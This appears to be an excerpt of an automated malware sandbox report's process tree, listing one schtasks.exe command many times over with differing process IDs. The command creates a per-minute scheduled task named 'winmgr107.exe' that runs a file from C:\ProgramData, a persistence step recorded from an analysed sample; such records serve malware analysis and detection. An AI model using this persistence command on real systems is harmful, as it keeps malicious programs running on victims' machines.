C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:3972
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3824
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:400
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:4180
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2788
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3392
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4180
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1216
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6256
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8348
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11040
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11596
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10596
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10400
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10124
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11824
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9420
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9332
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9140
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9504
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9272
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10036
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9756
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9248
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10140
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11844
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9816
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:12152
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9444
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9184
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8980
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8468
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8604
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11840
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8424
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9160
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8768
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8600
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8396
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8332
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11424
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11420
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8824
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8548
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11316
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8296
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:7404
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3452
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8096
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:7484
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:7344
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8100
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:11052
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6668
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:7136
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6716
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6288
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6976
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:6464
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:7048
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10348
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11000
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5664
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9880
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5156
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:5380
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10668
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:5192
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4496
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:844
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10376
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10536
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4352
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:208
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:3628
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:4676
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:1064
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2820
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3788
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11020
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10820
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11560
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10728
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:10264
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9536
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:11884
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9744
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9284
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:12024
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:12088
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9588
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9932
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:10016
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9816
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:9436
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9324
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8664
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8820
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:3608
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:12172
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8676
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8248
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8896
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8568
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8308
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:9080
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8992
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8824
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8364
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8340
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8296
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:7776
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8180
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:7524
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8124
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:7944
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:7656
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:8116
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8056
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6224
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6148
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵PID:216
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6308
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:6968
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks.exe /create /sc minute /mo 1 /tn "winmgr107.exe" /tr "C:\ProgramData\winmgr107.exe" /f3⤵
- Creates scheduled task(s)
PID:8612
-
-
